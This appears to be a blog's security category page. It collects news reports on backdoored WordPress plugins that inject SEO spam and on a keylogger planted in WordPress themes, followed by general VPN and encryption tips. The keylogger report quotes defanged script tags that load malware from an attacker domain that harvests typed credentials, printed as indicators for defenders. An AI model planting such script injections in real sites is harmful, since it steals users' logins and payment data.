Browsed by
Category: Security

Malicious Backdoored plugins with More than 89,000 Active Installs found in WordPress Repository

Malicious Backdoored plugins with More than 89,000 Active Installs found in WordPress Repository

WordPress has such a massive ecosystem consist of a number of plugins and themes, threat actors involved in various malicious activities such as hiding the PHP backdoor scripts into the WordPress Security Plugin.

In this incident, the attackers sell existing unsupported plugins to new authors with backdoor code inserted and their goal is to insert SEO spam to the sites with the plugin installed.

Wordfence uncovers the incident and WordPress security team has closed the plugin from the store which means the plugin not available to download from the repository.


Malicious WordPress backdoor Plugins

Duplicate Page and Post

The Functionality of the plugin is to create a cloned post or the page, now the Current Owner of the plugin inserted backdoor scripts which makes a request to and injects cloaked backlinks to the site.

It has more than 50,000+ Active Installs and the plugins Removed from on December 14, 2017.

No Follow All External Links

Behaviour same as like Duplicate Page and Post this backdoor requests to and returns content based URLs and the backdoor used in injecting backlinks for SEO.

It has more than 9,000++ Active Installs and the plugins Removed from on December 19, 2017.

WP No External Links

It is same as the previous two backdoors it requests and returns content based on the URL and the backdoor used in injecting backlinks for SEO.

It has more than 30,000+ Active Installs and the plugins Removed from on December 22, 2017.

Wordfence says Orb Online, paid for both the No Follow External Links and Duplicate Page and Posts plugins and the same threat actor involved in purchasing and injecting backdoors to all three of these plugins with the goal of injecting SEO spam into the thousands of websites running the plugins.

If you have the plugin installed it is highly recommended to uninstall them immediately and scan the website for infection with sucuri and gravity scan.

Thousands of WordPress websites get hacked every day, so securing your blog must be top of mind. Luckily, it’s not all rocket-science as you need to make most of the tweaks only once.

Keylogger Discovered in more than 5,000 WordPress Websites

Keylogger Discovered in more than 5,000 WordPress Websites

New research revealed that more than 5,000 WordPress websites are running along with keylogger and also it’s trying to running crypto-miner in the browser while browsing the infected website.

Recent days WordPress websites displaying unwanted banners at the bottom of the page which appears 15 seconds after browsing the website due to injecting  the Cloudflare[.]solutions Scripts in function.php. that does not belong to Cloudflare.

<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/reconnecting-websocket/1.0.0/reconnecting-websocket.js'></script>

<script type='text/javascript' src='hxxp://cloudflare[.]solutions/ajax/libs/cors/cors.js'></script>

It used to load this malicious script every time admin pannel logged in both front end and backend.

In this case, the second  script contains cors.js which is injected in an encoded format and once it decoded we can see that there are a two URLs with long hexadecimal parameters:

A domain name seems to be original Cloudfare URL but when we come down analyzing the ,it contains linterkey variables.

Further, analyze revealed that linter.js contains a real Payload in hexadecimal numbers after the question mark in the URLs.

According to sucuri, This script adds a handler to every input field on the websites to send its value to the attacker (wss://cloudflare[.]solutions:8085/) when a user leaves that field.

This Payload has capable of performing the keylogging activities each and every time admin logging on their WordPress website.

Here using this WordPress Keylogger, both the username and the password were sent to the cloudflare[.]solutions server even before a user clicks on the “Login” button.

The Same portion of this first attack and the second attack took place in April and November month and this is the latest scenario that is capable these stately keylogging futures.

The worst part is if this flow has successfully executed in e-commerce based WordPress website then the hacker can able to access the payment related information.

Mitigation steps for this WordPress Keylogger

  • Performing the Proper Pentesing for WordPress Website – Pentesting Checklist
  • As we already mentioned, the malicious code resides in the function.php file of the WordPress theme. You should remove the add_js_scripts function and all the add_action clauses that mention add_js_scripts.
  • Given the keylogger functionality of this malware, you should consider all WordPress passwords compromised so the next mandatory step of the cleanup is changing the passwords (actually it is highly recommended after any site hack).
  • Don’t forget to check your site for other infections too. Many sites with the malware also have injected coinhive cryptocurrency miner scripts.
6 Ways to Protect Yourself on the Internet

6 Ways to Protect Yourself on the Internet

  • Whether you are an employee, owner, or a home worker, your work will certainly involve the internet. However, while the digital world offers a wide range of tools to boost productivity, it is also a hotbed for malware and fraud tools designed to steal your information.

    Wondering how you can stay safe while online? Read on for 6 must-know tips every savvy netizen should know.

    1. Keep your antivirus updated

    In simple terms, an antivirus works by scanning your machine for malware and helping you restrict its spread.

    Unfortunately, malware is constantly evolving. As these internet nasties grow in number and sophistication, the best defense is to frequently update your antivirus.

    By updating your antivirus, you make sure your system is up-to-speed with newly identified viruses and equipped with the latest tools to remove them.

    2. Hide your IP address

    If you don’t like stalkers knowing where you are physically, chances are you don’t want snoops knowing where you are (or what you’re doing) online.

    Whether you want to access social media while abroad, watch the latest sports online, or just want to conceal your internet activity from your ISP, you can’t go wrong by making a habit of hiding your IP.

    There are many ways to hide your IP address. The safest and most reliable to do this is to use a VPN (more on this later).

    3. Use a strong password

    If you’re still use “Password” as your password in 2017, you should probably stop using the internet (for your own good). Your passwords are like the keys to your apartment. Don’t settle for one that any stranger can guess and replicate.

    There are many techniques for building strong passwords, such as mixing in a variety of letters, numbers, and symbols to using two-factor authentication for additional security. Another avenue to consider is using a password generator to create passwords that cannot be easily cracked via brute force hacking. You may also want to use a password manager to help you store your passwords.

    4. Don’t access confidential information on public networks and machines

    With the prevalence of Wi-Fi, it’s often a temptation to connect to a public network while traveling or working on the go. The same can often be said for using public computers in libraries and airports.

    While it’s not a problem to use public machines and networks for non-private matters, it would be a very bad idea to log into your social media, bank, or work accounts while on these machines/networks. A bugged machine may have keyloggers installed to track what you type, while a rogue network may capture your data and send it to nefarious individuals while injecting malware into your own device.

    5. Beware of cookies

    Cookies were designed to help websites remember visitors, allowing them to provide a more personalized experience to each user. However, they can also be abused to track your online activity and to send you targeted advertisements.

    To protect yourself from malicious cookies, remember to delete any cookies after each browsing session. You can also use a private web browser such as Tor.

    6. Use a VPN

    A VPN is a swiss-army knife for online safety. It hides your IP address (as mentioned above), anonymizes the data you send into the internet, and can even let you access geolocation-specific discounts and content.

    That said, be careful when choosing a VPN provider. Make sure the provider offers a wide range of locations, does not keep user-identifying logs, and is not a free VPN service. Maintaining high quality VPN servers is not a cheap proposition, and if they’re not charging you for it, they’re almost certainly making money by selling your activity to a third party somewhere else.

    The internet remains a wonderful place for productivity, entertainment, and innovation. However, many dangers await the unwary. Remember to follow these practices, exercise common sense whenever you’re unsure, and you’ll be able to enjoy the best of the internet without worry.

4 Reasons Encryption Is An Entrepreneur’s Best Friend

4 Reasons Encryption Is An Entrepreneur’s Best Friend

  • If you’re an entrepreneur and you use public Wi-Fi, you’re an easy target for hackers looking for data to steal. Public Wi-Fi today is usually unencrypted, which means it’s open season for hackers.

    Encryption is vital to your privacy and data security, which translates to maintaining your business without having your bank accounts and proprietary information stolen.

    Encryption in a nutshell

    Encryption transforms data into an unreadable form that can only be decrypted by a special key. An encrypted file, when opened, will look like gibberish until it’s properly decrypted.

    If you haven’t given genuine consideration to encrypting your data, here are 4 reasons you should:

    1. If you use public Wi-Fi, your data is at risk

    When your Wi-Fi network is password protected, that password protects the websites you visit from being discovered by other people. Without a password, hackers can access the websites you visit, along with anything you type into unencrypted web forms.

    Public-Wi-Fi has never been completely secure, although in years past it was commonly protected by a temporary password that would only be provided with a purchase. This type of protection made it harder for hackers to gain access to information being sent across the network.

    You can’t control whether or not public Wi-Fi is encrypted, but you can take your own precautions to protect yourself like using a VPN to route your traffic through an encrypted server. While a VPN isn’t a guaranteed solution, it does decrease your risk of getting hacked.

    2. You can’t rely on encrypted websites

    Just because a website is encrypted doesn’t mean you are automatically protected anytime you visit that site. For example, your bank’s website is probably encrypted, but if you’re using an unencrypted Wi-Fi network to access your bank’s website, your login credentials could easily be stolen as you type them in.

    Hackers can also hijack HTTP connections and create fake HTTPS links that you think are real, allowing a man-in-the-middle attack to intercept what would otherwise be a secure browsing experience.

    If your computer is infected with a keystroke logger, anything you type into your computer will be transmitted to the hacker, even if you’re connected to the most secure network in the world.

    If you’re on an unencrypted network, like the ones at Starbucks, someone could sit in the lobby with a simple tool and hijack your browsing session.

    The only way to prevent this is to keep your data encrypted on your computer, or better yet, don’t use public Wi-Fi networks when conducting your business.

    3. Emails can be hijacked

    Encrypting emails is especially important because that’s where most company communications take place. Credit card numbers and company secrets are commonly exchanged through email, and if anyone is snooping in on your email conversations you can guarantee that information will fall into the wrong hands.

    Some businesses only require employees to encrypt emails they consider to be private, but employees might misjudge what’s considered private. That’s why you should install a program on your company’s email server that encrypts every email, and not allow staff to encrypt selectively.

    4. Not all hotspots are authentic

    Hackers often create fake hotspots to trick people into connecting to what they think is their usual coffee shop Wi-Fi network. For example, they might bring a device into Starbucks and setup a fake hotspot called “Starbucks.” If you’re savvy enough to remember how the real network’s name is spelled, you won’t get caught in this trap.

    Real networks are prone to becoming compromised, though, so even connecting to a genuine hotspot could be dangerous.

    Data encryption isn’t just for top-secret files created by the government. There are real threats out there, and your data in any form should be encrypted at its destination as well as in transit.

The Importance Of Using A VPN

The Importance Of Using A VPN

  • Almost every household in America now has access to the Internet. You pay a substantial fee each and every month and should be able to use the Internet freely without hurdles. Nevertheless, some companies and governments believe otherwise. These entities want to monitor your online activities all day, every day to ensure that you’re not up to something malicious. Or perhaps these groups are simply paranoid and prefer to keep users under lock and key? Whatever the case might be, everyone should learn how to protect their identity online. The importance of learning to use a VPN will be explored in greater detail below.

    No Restrictions

    In some cases, using a virtual private network is done to shield your identity. In others, the user may wish to break the constraints and gain access to content that may be blocked in their country. YouTube, Netflix, Hulu and other websites have content that is only accessible to people from certain geographical regions. In this type of situation, it would be impossible to access this content. This is where a virtual private network will come in handy. By utilizing a VPN, you will be able to make it appear that your company is located in a different area.

    This will allow you to jump the hurdle and unlock the content immediately.

    Maintaining Your Anonymity

    Privacy has become a major concern for consumers all around the world. Today, consumers understand that they’re consistently watched by the government, as well as the world’s biggest corporations. Wouldn’t it be nice to be able to allude their monitoring systems? This is truly one of the most common uses of a virtual private network. VPNs tend to be much more effective at hiding the user’s identity than proxies and IP maskers. By utilizing a VPN, you will be able to secure your identity, connections and communications.

    Using the best VPN will make it impossible for your Internet service provider to track your activities. Simultaneously, the websites and applications you use will not be able to gain access to your true identity.

    Changing Your IP

    As you likely already know, each and every computer connected to the Internet is assigned an IP address. Your IP address closely resembles your fingerprint, but there is a major difference. While it is generally not possible to alter your fingerprint, your IP can be changed fairly easily. Often times, consumers can simply disconnect from the Internet, reconnect and gain a new address. However, you may be interested in a more dramatic change. If so, you will definitely want to setup your computer to use a virtual private network right now.

    With a VPN, you will be able to change your address, as well as other details. This can be a good way to gain access to websites that have previously banned your IP address or IP range.

    Improved Wi-Fi Security

    Security is a major concern when it comes to connecting to the Internet through a Wi-Fi hotspot. It can be convenient to use the Wi-Fi at an airport, restaurant or bookstore, but there are many risks involved. When utilizing a free Wi-Fi hotspot, there is a possibility that a hacker will be able to log the unencrypted data sent from your computer to the websites that you’re using at any given time. It is pertinent to take steps to prevent this from happening! A VPN is a great solution to this precise problem.

    A VPN will give you the ability to encrypt your activities, so they cannot be used by hackers. If you want to keep your social media or banking details private while using a free Wi-Fi hotspot, a VPN is truly a necessity.

    Accessing Censors Websites

    Believe it or not, some governments believe it is in their citizen’s best interest to block access to certain websites. In some countries, such as China, websites like YouTube and WikiLeaks have been blocked. This can make it very difficult for people living in these countries to know what is going on in the outside world. VPNs give these individuals the freedom to browse these websites and gain access to the truth! If you happen to live in a country that restricts your freedom to use the Internet as you see fit, you should learn how to use a VPN as soon as possible.